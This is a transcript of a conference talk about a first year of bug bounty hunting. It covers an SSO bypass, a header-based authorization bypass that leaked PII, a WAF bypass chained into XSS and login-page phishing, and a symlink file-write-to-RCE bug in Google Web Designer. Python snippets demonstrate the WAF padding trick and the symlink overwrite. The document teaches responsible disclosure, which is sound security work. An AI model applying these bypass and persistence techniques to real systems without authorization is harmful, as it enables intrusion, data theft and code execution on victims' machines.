
Bug Bounty Year 1: $0–16k, Low to CVE #BSidesBUD2025

BSides Budapest · 2025 · 40:23 · 1.1K views · Published 2025-06
Category: Career
Difficulty: Intro
Style: Talk
About this talk
Bálint Magyar - Bug Bounty Year 1: $0–16k, Low to CVE

This presentation was held at the #BSidesBUD2025 IT security conference on 21st May 2025. A bug safari for beginner level professionals and enthusiasts, showcasing 5 simple but interesting bugs, and some lessons learned in year one of hunting.

Slides: https://bm.gy/bsb2025
Articles, etc.: https://bm.gy
https://balintmagyar.com/
https://bsidesbud.com

All rights reserved. #BSidesBUD2025 #bugbounty #cve
Transcript [en]

Without further introduction, I'll just hand you over to Bálint Magyar. Thank you very much, and thank you all for joining. So, this is Bug Bounty Year 1: $0 to $16k, low to CVE, and it's going to be a brief overview of about a year of bug hunting that I started early last year. But before I begin, I want to do a really quick survey. How many of you have participated in a bug bounty program before? Disclosure programs count. All right. How many of you want to participate at some point? Maybe? All right, there's a couple. I hope this talk will increase the number of those people. So, yeah, let's get

into it. A real brief intro (forgot to start my timer): my name is Bálint. My pronouns are they/them. I'm a hacker. I make games, music, art, all sorts of creative things. I've actually been a professional designer for over 15 years. I recently transitioned into cybersecurity, and now I'm a red team and validation engineer at the same company where I was a designer before. And I've been hunting bugs since early last year. Real quick about the agenda: we're going to look at the year from a bird's-eye view, just to give you an overview. And the main part

of this presentation will be a little bug safari through four bugs that I bring you: an SSO bypass, a leak of personally identifiable information, an account takeover, and a client-side remote code execution, with some closing notes at the end. I'm going to try to include some lessons I learned from each of these bugs, for context and hopefully for your learning benefit. Many of you might have more expertise in some of the areas I'm going to touch on here, but they are going to be explained at an introductory level for the sake of beginners. This video is going on

YouTube as well, so probably a lot of people who are just starting out are going to watch this, and hopefully this bug safari will give you some context on the journey. I also hope I can highlight the sort of increase in complexity as I learned throughout the year. But I do want to preface this: I was not completely new to this. In the most general sense of the term, I've been hacking since I was a child. I started off with computers running DOS; back then you had to do a lot of tinkering sometimes just to get the things you wanted to run to run. So

there's some background there. I have been a hobbyist developer for many years, making personal tools, video games, little stuff, and I have been working with software developers as a designer for more than a decade, so I saw the sausage being made, and I think that's very important context here. I have completed several application security related online courses and did a lot of labs, and, as you'll see in the timeline in a second, I would say my bug hunting endeavor is bordering on obsession. I just wanted to give you this context: if you're very new at this, this should not be a benchmark

for what you can and will achieve within a year. I would say I spend an unhealthy amount of time and effort on this, but I hope it will still be educational in terms of what I actually found. All right, let's move on to a little overview. I actually kept track of all the time I spent hacking throughout these approximately 12 months, which added up to about 1,200 hours. You can see a summer break and a winter break there, but other than that, I was basically hacking every single day, averaging out over the 365 days to about three to four hours a day,

but normally I did about four or five hours on a weekday after work, and then 10 to 12, sometimes 14 hours on weekends. Yeah, so that's what I meant by obsession. This is not something I would recommend replicating; it's just context on how much time I spent on this. And at the end of the 12 months I had four low-severity bugs, two mediums, one high severity, and one critical, which added up to about $16,000 total. All right, so here comes the main bit of the presentation, where I'm going to walk you through those four bugs and sort

of illustrate what I've learned through them. Bug number one is the SSO bypass. I'm going to whizz through this because it's pretty basic. We have a pretty normal web app on example.com here: when you load the main application, it loads. That's it. I discovered dev.example.com, which was a pre-production environment, and it turned out to be protected by employee-only single sign-on. For context, I was basically doing manual hacking here, observing differences between how the two domains react, what kind of headers I get back, and so on. For a lot of the paths I was trying, I was just

getting the Entra ID (Microsoft) SSO redirect. But I did notice something interesting in the main app's proxying behavior: a difference in response headers between some paths on that application. For example, stuff I requested from the top-level directory was served from server one, based on some information in the headers, but when I looked at stuff in the static directory, I got different headers, which suggested it was coming from a different server. (Please come in, plenty of seats. We started a bit early here.) All right. So, the bypass was very simple. dev.example.com gave me the

Microsoft SSO. But when I went to dev.example.com/static, the actual web application loaded. It gave me a soft 404, but the full JavaScript application loaded, and the app was fully functional after that point. So the bug is info disclosure via SSO bypass. It was a low-severity bug and it got me a $200 reward. The lessons learned here: this was very early on, so it was very important to me as a beginner, and I made the beginner's mistake of blowing up the impact in my head. This is the end of the world, I can access pre-production client code! And the target basically went, meh.
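That compare-and-contrast step on response headers is easy to mechanize. Here is a minimal Python sketch of the idea; the header names and values below are hypothetical, not taken from the real target.

```python
def header_diff(a, b):
    """Return the headers whose values differ between two responses."""
    keys = set(a) | set(b)
    return {k: (a.get(k), b.get(k)) for k in sorted(keys) if a.get(k) != b.get(k)}

# Hypothetical header sets captured for "/" and "/static/" on the same host.
root_headers = {"Server": "nginx", "X-Served-By": "app-1", "Content-Type": "text/html"}
static_headers = {"Server": "nginx", "X-Served-By": "cdn-edge-3", "Content-Type": "text/html"}

# Only the backend identifier differs, hinting at a second server behind the proxy.
print(header_diff(root_headers, static_headers))
# {'X-Served-By': ('app-1', 'cdn-edge-3')}
```

In practice you would collect the header dictionaries from real responses and diff paths pairwise; any key that varies between paths on one host is a lead on the proxying setup.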

So ultimately, the risk and the level of threat is determined by the target, and you can't really do much about that. It's in your interest to understand it ahead of time, so you know where to spend your time. Mind the details; compare and contrast. If I had not noticed the subtle differences in what certain paths returned on the main application, I would not have noticed the difference in how it was proxied, and probably the way the SSO was configured versus how that proxy was configured was what gave rise to this vulnerability. Yeah. So try to

understand the infrastructure based on what you're seeing. Look at everything with a magnifying glass and take plenty of notes. I'm not going to keep repeating this for all the bugs, but it's so important, because often, even for something as simple as this, you don't find it in one straightforward pass. You find a little bit of information one day and another piece a week later, and after a while you're able to connect the dots, so it's really important to keep track of those notes. All right, moving on to the leak of personally identifiable information. As an overview, this was a large target with many client applications.

Many of the client applications shared an admin API. The way I approached this was a very wide recon, plus source code review, because as it turned out this customer had plenty of client applications with source-mapped code, which gave me a lot of information. What I was looking at specifically was this admin API. It had a bunch of endpoints, but it basically returned a 401 Unauthorized when you just tried a GET request against it. The API flow for the admin users themselves was pretty standard: you submit a username and password, you receive a JSON Web Token,

and then you request the authorized endpoints with that token and get the response from the API. Nothing special. As I did my recon on this target (they had a wildcard domain, so extreme numbers of subdomains were in scope), I did a lot of fuzzing with standard word lists that you'll find in repositories like PayloadsAllTheThings or SecLists, and through this fuzzing I found a pre-production client with source-mapped client code, which gave me a lot of information to work off of to tailor my word lists. So

I used the info in that source code to build a domain-specific word list for this target, which actually led me to find some other clients that the standard word lists didn't turn up. Let's just call the one that's important here satellite-dev.example.com. Looking at this pre-production version of the satellite client, based on the source I deduced that it was used for some sort of automation (the code was source-mapped, lucky for me), and it consumed the same admin API as the admin users on the main application, but its authorization and authentication differed from those of actual human end users.

And it was pretty simple: instead of logging in with a username and password, this client just sent requests to the API endpoints with two special HTTP headers, X-Client and X-Key, which contained some form of secrets to authenticate, and it got the response based on that. So, like I said, the satellite client source was source-mapped, and unfortunately for them, they did something really bad. I don't hear a lot of gasps, so probably not a lot of Node.js devs in the audience, but this is not a great idea: this client basically pulled the entire process environment

variable context onto the client side, which is not good. It allowed me to see things when I ran this client in the browser, such as the values for those X-Client and X-Key headers that were required for the admin API calls. So I took those values and sprayed them all over the list of endpoints I had for this API. Unfortunately I got 401s, except for one endpoint, which started spewing JSON at me. It went by really fast. It turned out to be thousands and thousands of user records containing very sensitive private information.

All right. So the bug: pretty simple. It's a credential leak of the X-Client and X-Key values, and some form of credential sharing between production and pre-production environments. But that was not the bug itself. The bug was that when you accessed the endpoints you got a 401, but when you had anything in these two header values, you got an OK response with all of the data there. So ultimately, it was a PII leak via authorization bypass: over 10,000 user records. This was a critical, and I got a $3,000 reward for it.
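To make that authorization flaw concrete, here is a toy Python model of the logic as described: the vulnerable endpoint effectively checked that the two headers were present, not that their values were valid. The header names follow the talk; the secret values and record contents are invented for illustration.

```python
# Made-up stand-ins for the real secrets the service should have checked against.
SECRETS = {"X-Client": "prod-client-id", "X-Key": "prod-secret"}
RECORDS = ["...thousands of sensitive user records..."]

def broken_endpoint(headers):
    # The vulnerable logic: any non-empty header values pass the check.
    if headers.get("X-Client") and headers.get("X-Key"):
        return 200, RECORDS
    return 401, None

def fixed_endpoint(headers):
    # What it should have done: compare the values against the stored secrets.
    if (headers.get("X-Client") == SECRETS["X-Client"]
            and headers.get("X-Key") == SECRETS["X-Key"]):
        return 200, RECORDS
    return 401, None

print(broken_endpoint({})[0])                                     # 401: headers absent
print(broken_endpoint({"X-Client": "junk", "X-Key": "junk"})[0])  # 200: the bypass
print(fixed_endpoint({"X-Client": "junk", "X-Key": "junk"})[0])   # 401: values rejected
```

The real check presumably lived behind a reverse proxy or middleware; the point is only the presence-versus-validity distinction.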

Lessons here: if you go wide, then use that information to connect the dots. I had a lot of info about what kinds of subdomains this target had, with all sorts of clients in there with source code. Use that to your advantage, for example to tailor word lists that are specific to that target's domain. I think this is very important. And I'm going to echo something here that many top hackers say, which is that recon is for finding things to hack on. It's really satisfying to just throw a word list at a fuzzer and see all the subdomains and paths and endpoints pop up,

but if you don't actually go look at them, they're not very useful. So go do that. Those are two tools I found really helpful for sifting through the noise and finding the things that are interesting. And yeah, it's a good idea to keep track of your IPs. In this case, because it was a PII leak, the target really wanted to make sure that nobody else had accessed that list without authorization, so they asked for my IPs so they could check. All right, on to the account takeover. This is going to be a bit more complex.

So, the actual depiction of this target here is going to be a bit contrived; I had to conceal what the actual target was. It's sort of unusual, but bear with me, and just focus on the functionality of the application. They had user-editable, sort-of-public pages. You had to know a unique page ID to be able to view these pages, but they were editable if you logged in with that unique page ID itself, a username, and a phone number. I know, weird; just bear with me. So, looking at this visually, we had a view-only

state where, if you had the unique page ID, you could just visit the URL and get some non-sensitive data back regarding that user. Then, if you wanted to log in, you again provided the page ID, a username, and a phone number. Once you were logged in, you got a session cookie, as well as the ability to add that session ID to the URL and arrive at the logged-in state, which is going to be very important. Here you could see some more information sensitive to the user, and you could edit some of that data as the user. We're going to focus on the field called private data there.

My approach here was again manual hacking and source code review. The idea I had was that, since the page lets you get to a logged-in state with that session ID in the URL, maybe if I found cross-site scripting on this logged-in state, I could take the URL that results in logging in the visitor, send it to a victim, and have that cross-site scripting trigger. I wanted to use the private data field for that, which was one of the editable fields. And I just started basically putting an

innocuous HTML tag in there, the underline tag, just to see if HTML injection worked. But it turned out there was a web application firewall somewhere in between that blocked all the useful characters for HTML injection, so I got a 403 Forbidden. But I did not stop there. I remembered there were techniques for bypassing WAFs, one of those being nowafpls from the wonderful people at Assetnote. It's actually a Burp Suite plugin, but I just went with manual hacking and used the same principles as they did for the plugin. Basically, it works like this: WAFs have limits on how much of

a POST request body they will check, and there's a threshold for that, which defaults to between 8 and 128 kilobytes for most WAFs. So if you get your malicious payload beyond this threshold in the POST body, the WAF will just ignore it. That was the idea: prepend garbage somehow that allows my payload to get through, and bypass the WAF that way. So it was a question of finding the right kind of garbage, which I love that I can say in hacking, and oftentimes that is the task in hacking: finding the right kind of garbage. I started basically injecting stuff anywhere I could. For example, the

value of a new garbage key, as an example. I got a 500 Internal Server Error, which suggested there were checks on some form of validity before the WAF. I tried the key name; that also gave me a 500. I tried putting garbage outside the JSON structure; again, 500. And then eventually I got a unique response for the contents of the email field, which gave me a 400 instead of a 500 or a 403, along with a verbose error about the email field value being too long. So I pushed on and tried putting more stuff into it, and I eventually got to just spaces,

shown here as underscores for visibility. What struck me was that when I included spaces, I got the response from the WAF instead of any sort of 400, which suggested something was happening that I wasn't accounting for. At this point I had enough information to try to build the logic in my head and figure out what was actually happening behind the scenes. So that's what I did. It looked like there was some form of validity check on the JSON syntax itself, not surprisingly; there seemed to be some sort of validity check on

what kinds of keys were present or not present; and then there was a check on the actual values of those fields: are they the correct type, are they below a certain length. And only then did the request eventually get to the WAF: is this okay to go? So I continued pushing on with the email field, and I added 8 kilobytes of spaces with high hopes, but unfortunately I got the 403 response from the WAF again. That led me to believe there was a step I might be missing in my own model of what's happening. It's valid JSON, with valid fields; there might be a trimming of

whitespace at some point, after which the length of the email field value is checked, and only then does it get to the WAF. So the task was to find characters that don't get trimmed as whitespace, but do contribute to the length of the request while not being counted toward the field's length. I very quickly got to zero bytes, Unicode-encoded to keep the JSON valid. With a short value I still got the WAF's 403 Forbidden, but when I padded it out to 8 kilobytes, it actually did the bypass.
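The finished padding trick can be sketched in a few lines of Python. The field names and the 8 KiB figure follow the talk; the exact JSON shape and the injected tag are illustrative. The point is that the literal six-character sequence \u0000 is valid inside a JSON string and survives whitespace trimming, while inflating the raw body well past a typical WAF inspection window.

```python
import json

# Literal six-character sequences "\u0000": valid JSON string content,
# not trimmed as whitespace, but they inflate the raw body size.
padding = r"\u0000" * 2048   # 6 * 2048 = 12,288 bytes of escaped NULs

# Hypothetical request body; "email" and "private_data" mirror the talk's fields.
body = '{"email": "user@example.com' + padding + '", "private_data": "<u>test</u>"}'

assert len(body) > 8 * 1024   # the interesting field now sits past an 8 KiB limit
doc = json.loads(body)        # the backend still parses this as valid JSON
```

A WAF that only inspects the first 8 KiB of the body never sees the injected markup in private_data, while the backend happily decodes the escapes and processes the request.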

All right. So now we can inject HTML into the logged-in state of this malicious actor's page.

Next, I needed to find out what sort of XSS could work here. I did the classic thing: inject a broken image with an error handler. Popped an alert. Great, so we have JavaScript executing there; nothing stopping us. So I started thinking about what sort of payload we could put there that could achieve impact. The obvious one would be to just make a GET request with a fetch call to an attacker-controlled server, and maybe pass the cookie for the logged-in session in the URL. But if you paid attention, you might notice at least one problem with this.

There's another one, too. There was a length limit on the private data field, and it was 60 bytes, so that particular example would not have worked. The other problem is that, because we have the session ID in the URL, the person who's logged in is us, so the only cookie we could exfiltrate is our own, which is not helpful. So how did I get around this? My idea was first to get past the length limit, because to get around the session-overriding limitation I needed a much longer payload, but I was limited in

length. So I wanted to smuggle the payload in somehow. I remembered this technique where you use the URL fragment, the part after the hash mark in the URL, to smuggle in the code, and then use the stored XSS we have on the page to evaluate the code from the URL, slicing off that hash. And just as a treat, we can also Base64-encode it, which still keeps the stored part under the 60-character limit. So that's what the payload looks like, obviously much longer with the encoded payload there. The actual exploitation then looked like this: we

have the payload in the URL, we have the stored XSS on the page in the form of the image evaluating the code from the URL, and then the actual payload itself, decoded, is something like this. We find a container on the page, and we replace it with, or inject, an iframe pointing at the legitimate login screen itself on the target, and we add some CSS to basically blow it up and cover the malicious attacker page with the legitimate login page. Then we have some code in the background that checks for the login form actually being filled in, so that as soon as we can, we exfiltrate

the data. Visually, it looks like this: we have our iframe injection with the login there, and then we add some CSS to blow it up and conceal everything. So the only thing the victim can see is a weird URL, but I think we're pretty used to that in 2025. So yeah, that's phishing using the legitimate login page itself, which I found very amusing. It was this WAF bypass to stored XSS to DOM XSS, eventually leading to account takeover. The severity was medium and there was a $500 reward, which was a little disappointing, because not all programs cap account takeover via XSS

at medium. It makes absolute sense in the CVSS world when you evaluate the actual attack, but as a hacker, I obviously spent a lot of time on this, and $500 didn't really seem proportionate. All right. Some lessons learned: learn your target's framework. The way I found that XSS was by looking through the React code for this app, which was source-mapped. React has this attribute called dangerouslySetInnerHTML, which is a dangerous thing to use, and this particular app used it. But if I didn't know the basics of React, I probably wouldn't have even searched for that in the first

place. So learn at least the basics of the framework your target is using. Don't let a WAF stop you; there are multiple ways around it. And try to understand black-box logic like I did with the API that updates the data there. A scientific approach of tweaking just one thing and seeing what changes in the response is a helpful tool for that. And here's a mistake I think beginners make a lot, which is stopping at whatever code execution they get. In this case, if I had stopped at just an alert, I would probably not even have gotten the medium payout, because it doesn't demonstrate any sort of impact

to the customer that is meaningful to them. So keep pushing. Obviously, if you find a critical like the PII leak I showed you earlier, you have to report that immediately, but if you can escalate something, then you should try. But read the program scope, what's out of scope and what's not, because you can get in trouble. And some programs, I learned, cap XSS at medium even if it's full account takeover. That was pretty frustrating, but there you go. If you're lucky, the program actually lists in its policy that it does this; that way you can avoid them and get paid. All right. So for the final bug here, we have

a client-side remote code execution. This was in an app called Google Web Designer, and I can disclose this because it's published now; you can find it on my blog, and I'll post the URL later. It was specifically on macOS and Linux. This is a Chromium Embedded Framework application, which is basically like Electron if you're familiar with that: essentially a browser running natively, with a web app running inside it. This is how Slack works, for example, and a bunch of other apps. And this is what Google Web Designer looks like. I wouldn't fault you if you

hadn't heard about it before. This is an app that has been out since 2013, making it probably one of the oldest Google applications still being updated. It's pretty obscure, but apparently it's in use, and apparently they care about it. So I hacked on this. It's basically a visual ad editor for HTML5-based ads. My approach was mostly manual hacking, with some source code review. So this is JavaScript running inside that native app shell, which is essentially a browser. The source code was minified, but that didn't deter me. It's rough getting through minified code, but

if you know where to focus, or if you have access to a debugger, which you would for most web applications, then it's definitely not impossible, and it also makes you learn a bunch of stuff about JavaScript, which is cool. I also used strace on Linux to monitor the file operations and process execution, because that's not something the JavaScript can do directly; it's done by the app shell. All right. So this vulnerability has to do with the browser preview function of the application. Basically, as a user, you edit your ad, you want to see it live in a browser, you click a

button, and it opens your ad in a browser. That's it. Behind the scenes, what happens is you have this folder with your HTML file, a bunch of JavaScript boilerplate, all your images, and so on. When you click preview, the app creates a folder under that folder, named GWD preview plus the name of your ad, and this is the vulnerable operation: it then copies everything under that in a flat structure, launches a local web server, and uses that preview directory as the root of the web server to show you your ad. This is required because of all the weird JavaScript stuff that Google is doing

with Google ads, which calls out to other servers; it can't just open a local file and show it to you directly. All right, so let's zoom into that vulnerable copy action. Normally this wouldn't be anything special. You have your friendly ad folder there with an assets folder; it has an HTML file, and under assets there's an image. When you click preview (oh no, my laser pointer doesn't work; almost), that directory gets created there, GWD preview friendly ad, and the structure gets flattened into just a list of files based on the parent directory's

contents. A little aside on symbolic links. I'm assuming most of you know this, but just a brief explanation: on many operating systems, you can create these virtual files that point at other files. In this example, my cool link file, when read by an application that follows symbolic links, would lead to the contents of test.txt instead. Abusing that in combination with this copy mechanic, what an attacker could do is include that preview directory already, as part of the malicious package, and in that directory have a symbolic link that points to somewhere nasty, plus an asset with the

same name as the symbolic link, which will then get overwritten, following the symbolic link to that nasty place. So in this case, because the preview directory already exists when you click preview, it doesn't get created, it doesn't get deleted or anything; your ad HTML file gets copied in there, your assets get copied in there, and the asset has the same name as the symbolic link in the preview directory, which gets followed to place the file. So that's an arbitrary file write: we can create or overwrite files in this manner. It can only write into existing directories, though. Those were the constraints I

had to work with to find a way to escalate this. I could have stopped at the arbitrary file write, but I had learned that it often leads to RCE, so I was really interested in finding out how that was possible here.
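The vulnerable copy mechanic can be reproduced in a few lines of Python. This is a sketch of the general pattern, not Google Web Designer's actual code; the directory and file names (gwd_preview, logo.png, outside.txt) are invented for illustration. A naive copy into a directory that already contains an attacker-supplied symlink follows the link and writes outside the tree.

```python
import os
import shutil
import tempfile

root = tempfile.mkdtemp()
ad = os.path.join(root, "friendly_ad")      # the "malicious package"
preview = os.path.join(ad, "gwd_preview")   # attacker ships the preview dir pre-made
os.makedirs(preview)

target = os.path.join(root, "outside.txt")  # stand-in for "somewhere nasty"
with open(target, "w") as f:
    f.write("original contents")

# The attacker plants a symlink in the preview dir, named like a real asset.
os.symlink(target, os.path.join(preview, "logo.png"))

# An asset with the same name, carrying the payload.
asset = os.path.join(ad, "logo.png")
with open(asset, "w") as f:
    f.write("attacker payload")

# The naive preview copy: writes to preview/logo.png, following the symlink.
shutil.copyfile(asset, os.path.join(preview, "logo.png"))

with open(target) as f:
    print(f.read())   # -> attacker payload (a file outside the tree was overwritten)
```

A safe implementation would delete and recreate the preview directory, or refuse to write through symlinks (for example by checking os.path.islink on the destination first).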

All right. So I found some naive techniques, as a beginner; I'm sure there are plenty more where this came from that are much more efficient and elegant. What I found was that on macOS, you can basically plant a launchd agent, which is an XML descriptor that tells the operating system what to run and allows you to run arbitrary scripts. And on Linux, I decided to go with overwriting the HTTP and HTTPS URL handlers, so that when the user clicked a link anywhere outside a browser, whether in an email or even inside the Web Designer application itself, it would

launch the malicious handler instead of the browser. On macOS, I had to plant one file, this XML file in plist format, and it just runs a script that pops up a dialog with some user information in it, as an example. On Linux, we actually need two files: one is the desktop entry that defines what to run (again, a dialog that pops up some user and system info), and another file that actually defines the handler for HTTP and HTTPS, with a reference to that desktop file. Then what we need is

the right symbolic links in the preview directory, so that these payloads end up in the right locations to cause some havoc. The problem was that all these files needed to go under the home directory of the user, for which the attacker would have had to know the name of the user ahead of time if we were to use an absolute path. Luckily, symbolic links can be created with relative paths: if the symlinks in the preview directory pointed two directories up, we would be in the home directory. But I didn't want to stop here, because that would mean we have to expect users to put this ad

directly in the home directory, and who knows where else it would work. But luckily, there's brute force. If you include a multitude of links that point to various locations, it turns out the application doesn't really care; the copy actions just fail silently if there isn't an existing directory there to copy into, for example wherever that config directory would exist. So I could include as many of these as I wanted. I included six from my PC, to get a bigger impact by reducing the prerequisites for this to work. So basically you have all these copies of the symbolic links at various depths,

and then you need copies of all the payloads with the appropriate names, so that the app takes them and overwrites files following the symbolic links. And finally, some HTML references inside the ad HTML file, so that these files get copied in the first place. Ultimately, they all end up in a zip file; zip very handily supports preserving symlinks with the -y parameter, so you can pack everything up and get it to your victims. Ultimately it would look like this (that's pretty small to read, but I'm going to walk through the steps): basically, the attacker creates the

zip file with the symlinks and the file and directory structure required for this. They distribute the zip file; these days, that would probably be something like malvertising for keywords like "cool ad template 2025". The victims download and extract the file, open it in Google Web Designer, and use it as part of their normal workflow: they edit their ad to their liking and eventually use the preview function. That's when our payloads get placed, and then eventually the code executes, based on what I described before. So the bug here: client-side RCE via improper symlink handling. This

was interestingly rejected by Google at first, because they said it depends on social engineering and they can't do anything about that. I argued that while they can't do anything about the social engineering, they can reduce the impact when it happens, and they eventually accepted it on that basis. It got a High severity rating and an $11,000 reward, and this was also my first CVE, so I'm incredibly proud of it. It was a very fun one.

All right, lessons learned. This was a big one for me, and I think for many beginner bug hunters: get comfortable with being uncomfortable. If I hadn't been nudged by a friend I made in

bug-hunting communities, I would probably not have gone for Google, because who wakes up after a few months of hacking thinking, I can hack Google, I can hack Meta, I can hack Apple? The good news is that these companies are run by humans as well, and sometimes you find gems like this app, basically in hiding for over a decade with a textbook symlink-following bug like this one.

Also, don't get scared off by minified code. You won't always have source maps; most often you probably won't. But you can use features like symbol renaming in VS Code and other IDEs: because the

IDE has some sort of logical representation of the code you're looking at, renaming a symbol isn't a blind find-and-replace; it only renames the relevant occurrences within the local context of whatever function they're in. So by focusing on the parts of the application that are interesting to you in terms of return on investment, you can gradually fill in the blanks, renaming things and figuring out how the code works.

And there's a whole world outside of the web. It would not have occurred to me to try to hack a native app. Obviously this

is a web app running in a native browser shell, but this happens a lot, and there are plenty of apps that work like this. I think very interesting things happen where those security boundaries are crossed: the JavaScript itself can't directly write files, but it interfaces with the app shell somehow, and the app shell interfaces with the operating system, which leads to stuff like this one.

And dig deep into the scope. Like I said, this app has been out since 2013, probably with this preview function in there, and for 12 years nobody found it. This is mind-blowing. And argue impact; but in

order to be able to do that, you have to understand the impact yourself. So don't just keep banging the table insisting that your Low is actually a Critical; if you can explain why it's high impact, then you might get some return for that. All right, some notes to close out.

If you work in tech, and I'm assuming most of you here are in tech or tech-adjacent in some form, you have an advantage if you want to start bug bounty. You understand what a server is and what a client is; if you have seen an HTTP request, you are way ahead of most beginners. Not necessarily on the nitty-gritty technical level, but in the conceptual understanding of how computers work, how the internet works, how networks work, how stuff like JavaScript works. That's a huge advantage. I did say that there's a world outside of the web, but I would focus on web first. Obviously, most apps out there

with bug bounties are web apps, and that's where most of the learning material is, so I think it's a great introduction. I would also highly recommend joining bug-bounty-related communities. There are all sorts of podcasts, YouTube channels, and so on, and they mostly have their own Discord servers. It's a really powerful way to expose yourself to a lot of creative ideas; I have found multiple of my bugs because of ideas I got from random conversations. And there has never been a better time to learn: there is so much educational material out there, whether you prefer to read, watch a video, or listen to a podcast, it's all out there.

So I would highly recommend it. Ultimately, I think I've learned that hacking is failing but persisting regardless, and I think that's true for basically anything in life that's worth doing. In many creative processes it's the same: you fail, you hit walls, you learn what went wrong, you tweak your approach, you see what changes, and eventually you find something. Thank you.

Thank you, Bálint. We have some time before Kat Fitzgerald's presentation. Do we have any questions for Bálint? "I'll be around, so you can feel free to approach me. I'm happy to answer any questions." There's the answer. Okay, we just have a few minutes while Kat sets up, and then we'll move on to the final presentation of the morning session. So if you just bear with us, we'll have the next presentation very shortly. Thank you.